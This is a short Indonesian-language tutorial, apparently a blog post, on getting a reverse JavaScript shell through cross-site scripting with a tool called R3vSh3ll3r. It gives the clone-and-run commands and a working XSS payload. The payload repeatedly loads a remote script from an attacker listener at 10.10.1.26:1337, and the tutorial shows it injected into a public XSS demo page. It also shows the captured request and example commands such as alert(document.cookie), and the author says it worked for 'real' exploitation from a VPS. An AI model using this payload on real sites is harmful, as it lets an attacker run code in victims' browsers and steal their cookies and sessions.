Exploitasi
1.Install R3vSh3ll3r pada komputer atau vps kalian
- git clone https://github.com/t3rabyt3/R3vSh3ll3r
- cd R3vSh3ll3r
- python R3vSh3ll3r.py
Pada pilihan WANT TO USE THIS LHOST? [Y or N]
Pilih Y
Pada pilihan WANT TO USE THIS LPORT? [Y or N]
Pilih Y
2.Sediakan live target
Saya memakai live demo xss dari brute logic http://brutelogic.com.br/xss.php?a=payload
3.Inject payload yang didapat ke situs target
Payload milik saya
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.10.1.26:1337"},100);>Inject ke target
http://brutelogic.com.br/xss.php?a=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.10.1.26:1337"},100);>4.Ketika payload berhasil tereksekusi maka akan menampilkan result seperti berikut:
untuk commandnya anda bisa memasukan command javascript seperti biasa:
GET / HTTP/1.1
Host: 10.10.1.26:1337| | | |
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
- alert(1)
- alert("1")
- alert('1')
- alert(document.cookie)
- dll
Kesimpulan:
- Saya melakukan testing pada beberapa browser dan hanya mozilla yang dapat tereksekusi
- Saya mencoba menggunakan ngrok namun tidak berfungsi
- Saya menggunakan VPS untuk exploitasi secara real dan berfungsi
Preview